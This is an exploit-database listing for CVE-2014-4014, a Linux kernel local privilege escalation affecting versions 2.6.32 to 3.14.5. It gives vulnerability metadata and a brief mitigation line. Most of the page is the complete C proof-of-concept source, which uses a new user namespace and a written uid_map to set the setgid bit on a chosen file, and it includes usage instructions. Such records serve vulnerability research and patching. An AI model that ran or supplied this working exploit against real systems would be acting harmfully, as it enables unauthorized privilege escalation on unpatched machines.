CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

vendor:

Linux Kernel

by:

Vitaly Nikolenko

7,2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Linux Kernel

Affected Version From: Linux Kernel 2.6.32

Affected Version To: Linux Kernel 3.14.5

Patch Exists: YES

Related CWE: CVE-2014-4014

CPE: o:linux:linux_kernel

Metasploit: https://www.rapid7.com/db/vulnerabilities/suse-cve-2014-4014/

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2014

CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

This exploit is a proof-of-concept for CVE-2014-4014, which is a local privilege escalation vulnerability in the Linux kernel. The exploit uses the clone() system call to create a new user namespace, and then sets the setgid bit on a file specified by the user. This allows the user to gain elevated privileges.

Mitigation:

The vulnerability can be mitigated by applying the patch from the Linux kernel mailing list.

Source

Exploit-DB raw data:

/**
 * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC
 *
 * Vitaly Nikolenko
 * http://hashcrack.org
 *
 * Usage: ./poc [file_path]
 * 
 * where file_path is the file on which you want to set the sgid bit
 */
#define _GNU_SOURCE
#include <sys/wait.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <limits.h>
#include <string.h>
#include <assert.h>

#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];

struct args {
    int pipe_fd[2];
    char *file_path;
};

static int child(void *arg) {
    struct args *f_args = (struct args *)arg;
    char c;

    // close stdout
    close(f_args->pipe_fd[1]); 

    assert(read(f_args->pipe_fd[0], &c, 1) == 0);

    // set the setgid bit
    chmod(f_args->file_path, S_ISGID|S_IRUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXUSR);

    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    pid_t pid;
    char mapping[1024];
    char map_file[PATH_MAX];
    struct args f_args;

    assert(argc == 2);

    f_args.file_path = argv[1];
    // create a pipe for synching the child and parent
    assert(pipe(f_args.pipe_fd) != -1);

    pid = clone(child, child_stack + STACK_SIZE, CLONE_NEWUSER | SIGCHLD, &f_args);
    assert(pid != -1);

    // get the current uid outside the namespace
    snprintf(mapping, 1024, "0 %d 1\n", getuid()); 

    // update uid and gid maps in the child
    snprintf(map_file, PATH_MAX, "/proc/%ld/uid_map", (long) pid);
    fd = open(map_file, O_RDWR); assert(fd != -1);

    assert(write(fd, mapping, strlen(mapping)) == strlen(mapping));
    close(f_args.pipe_fd[1]);

    assert (waitpid(pid, NULL, 0) != -1);
}